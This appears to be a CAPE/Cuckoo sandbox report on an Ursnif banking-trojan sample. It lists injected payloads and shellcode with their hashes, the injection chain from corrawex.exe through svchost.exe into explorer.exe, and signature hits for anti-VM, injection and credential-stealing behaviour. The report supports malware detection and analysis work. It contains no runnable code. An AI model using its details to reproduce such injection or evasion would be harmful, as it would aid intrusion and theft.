Ssdeep 768:wxxjTRHBig+dgoYwlGqr1Jn5a4it97iAa5:wxxT5gdTpGqr7n5a4y9Ja
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched
Download Download ZIP
Type Injected PE Image: 64-bit executable
Size 26112 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 8dc93214ae61c946839891b5011aba65
SHA1 c6981c264b4c97a5a9329713d0bb43b8b9d4b68e
SHA256 5f7f9ac1bea60fefc34c2815da80424833272405449500fb393438808f7fb104
CRC32 F39E5785
Ssdeep 768:CWkX7q+fpTYvVeZMmn+0C4xiNEbvKtPK:CX5fRuZE53vKtPK
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Injected Shellcode/Data
Size 792 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 d4c1d64ed64c12f47542acc4564ac2cf
SHA1 44df67f174dd11ec4237e5ac035761eb55df953c
SHA256 b55edc416693e04769013cb5d895bf096f2065cd423116620a31773482c8db05
CRC32 367DD4AF
Ssdeep 6:CYXe/eLuG4E1pS3lllYr/go3sr/gajGkYwfRo+Rln:GBGxPSV/ig3gaKzCbRln
Yara
  • shellcode_patterns - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Type Ursnif Payload: 64-bit DLL
Size 249856 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 1ef9eb9cd78e3c28ea41dc332c163ab7
SHA1 337c53135d4bfd4df8bb3bbf10b543dae0667a92
SHA256 1fedc723d7141b515b40234ecf2fe31a5593aff69b7ee9bb225272c95c27245f
CRC32 E1739A13
Ssdeep 6144:bCb3PM7ntLwvLVqLfKyV4bqoJCXZQWbjF:bCb3PmntMVqLCPqoJCXZQWt
Yara None matched
CAPE Yara
  • Ursnif
  • Ursnif Payload
Download Download ZIP
Type Injected PE Image
Size 193536 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 de567fe0dc559c3d4625e2c97a81085c
SHA1 907221d90ad21415c2c08804ba83bce3a2a26cec
SHA256 72f373080da0afbbdb99da6a8705af9150e874a1dbdffeb5287b4f8b6dd3c57c
CRC32 8E9D3FE5
Ssdeep 3072:d3V2mlM4ueaNS/BTUgCuVdboh8i0Cyot00QY6HK2qlalXnOM/S0CVBUy5RkyaErj:d3VraM/uuVdboJQot5QPVqlal+M/wBcg
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Ursnif Payload: 64-bit DLL
Size 250880 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 c712a107be9744190d3faaf90ddda132
SHA1 669b23ce5fcb7da6740f94c9a66c681cc5c4ab12
SHA256 6929e1a098a590caadd27c5e87a9e8da4b50e427fcb5b4787cac1786a7a0fbb9
CRC32 57D55324
Ssdeep 6144:hb3PM7ntLwvLVqLfKyV4bqoJCXZQWbjFi:hb3PmntMVqLCPqoJCXZQWt
Yara None matched
CAPE Yara
  • Ursnif
  • Ursnif Payload
Download Download ZIP
Type Injected PE Image: 64-bit executable
Size 2861568 bytes
Target Process explorer.exe
Target PID 1708
Target Path C:\Windows\explorer.exe
Injecting Process svchost.exe
Injecting PID 1308
Path C:\Windows\sysnative\svchost.exe
MD5 d3b92246cb77d2708894a21d2168274a
SHA1 f29a60029064b52043723c163fb63d0b47891349
SHA256 64cfb9342e76423f43c8d9d9dc396937c621ed8d1324d4e0632a4ce5d155904e
CRC32 E728EF44
Ssdeep 49152:8xrceI/lIRYraisQhFCU4NuvYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojosod:OrcPlIWy8vYYYYYYYYYYYRYYYYYYYYYh
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Injected Shellcode/Data
Size 792 bytes
Target Process explorer.exe
Target PID 1708
Target Path C:\Windows\explorer.exe
Injecting Process svchost.exe
Injecting PID 1308
Path C:\Windows\sysnative\svchost.exe
MD5 7b6dbcca8fd4ca9a8cdc6139d62b3ea1
SHA1 4154480a49c0bb86e4b81081bfbaec7613a572bb
SHA256 0715dd3be41f630963318fe2c4d9178322303504734a2e6c4ccfa7b150d93455
CRC32 3AA36F5F
Ssdeep 6:u7LuG1tctuHPk0k8vQ/TpljUEIf/yNMk0k8vQ/KEdIf/yNE3tOin3sG3:uuG16EPG8S1+iOG85i4v3
Yara None matched
CAPE Yara None matched
Download Download ZIP
Sorry! No process dumps.

Comments



No comments posted

Processing ( 6.873 seconds )

  • 3.842 CAPE
  • 1.761 BehaviorAnalysis
  • 0.62 Dropped
  • 0.222 Static
  • 0.164 TargetInfo
  • 0.093 Deduplicate
  • 0.092 TrID
  • 0.052 NetworkAnalysis
  • 0.019 Strings
  • 0.007 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.938 seconds )

  • 0.349 antidbg_windows
  • 0.054 decoy_document
  • 0.052 NewtWire Behavior
  • 0.051 api_spamming
  • 0.029 Doppelganging
  • 0.028 antiav_detectreg
  • 0.026 injection_createremotethread
  • 0.025 InjectionCreateRemoteThread
  • 0.019 antivm_vbox_window
  • 0.017 InjectionInterProcess
  • 0.016 injection_runpe
  • 0.015 InjectionProcessHollowing
  • 0.015 antisandbox_script_timer
  • 0.012 injection_explorer
  • 0.012 antivm_generic_disk
  • 0.011 infostealer_ftp
  • 0.01 mimics_filetime
  • 0.01 antivm_generic_scsi
  • 0.01 ransomware_files
  • 0.009 bootkit
  • 0.008 antiemu_wine_func
  • 0.008 dynamic_function_loading
  • 0.007 malicious_dynamic_function_loading
  • 0.007 stealth_file
  • 0.007 reads_self
  • 0.007 virus
  • 0.006 antivm_generic_services
  • 0.006 infostealer_browser_password
  • 0.006 kovter_behavior
  • 0.006 antianalysis_detectreg
  • 0.006 infostealer_im
  • 0.005 hancitor_behavior
  • 0.005 antiav_detectfile
  • 0.005 infostealer_mail
  • 0.005 ransomware_extensions
  • 0.004 exploit_getbasekerneladdress
  • 0.003 antidebug_guardpages
  • 0.003 recon_programs
  • 0.003 exploit_gethaldispatchtable
  • 0.003 persistence_autorun
  • 0.003 antivm_generic_system
  • 0.003 antivm_vbox_keys
  • 0.003 infostealer_bitcoin
  • 0.002 lsass_credential_dumping
  • 0.002 antivm_vbox_libs
  • 0.002 infostealer_browser
  • 0.002 EvilGrab
  • 0.002 shifu_behavior
  • 0.002 stealth_timeout
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 masquerade_process_name
  • 0.001 tinba_behavior
  • 0.001 uac_bypass_eventvwr
  • 0.001 sets_autoconfig_url
  • 0.001 rat_nanocore
  • 0.001 antiav_avast_libs
  • 0.001 exploit_heapspray
  • 0.001 stack_pivot
  • 0.001 Vidar Behavior
  • 0.001 betabot_behavior
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 ipc_namedpipe
  • 0.001 kibex_behavior
  • 0.001 exec_crash
  • 0.001 Raccoon Behavior
  • 0.001 cerber_behavior
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 ketrican_regkeys
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway
  • 0.001 recon_fingerprint

Reporting ( 0.028 seconds )

  • 0.014 SubmitCAPE
  • 0.014 CompressResults
Task ID 131469
Mongo ID 5e79d80522fb4f13386d7074
Cuckoo release 1.3-CAPE
Delete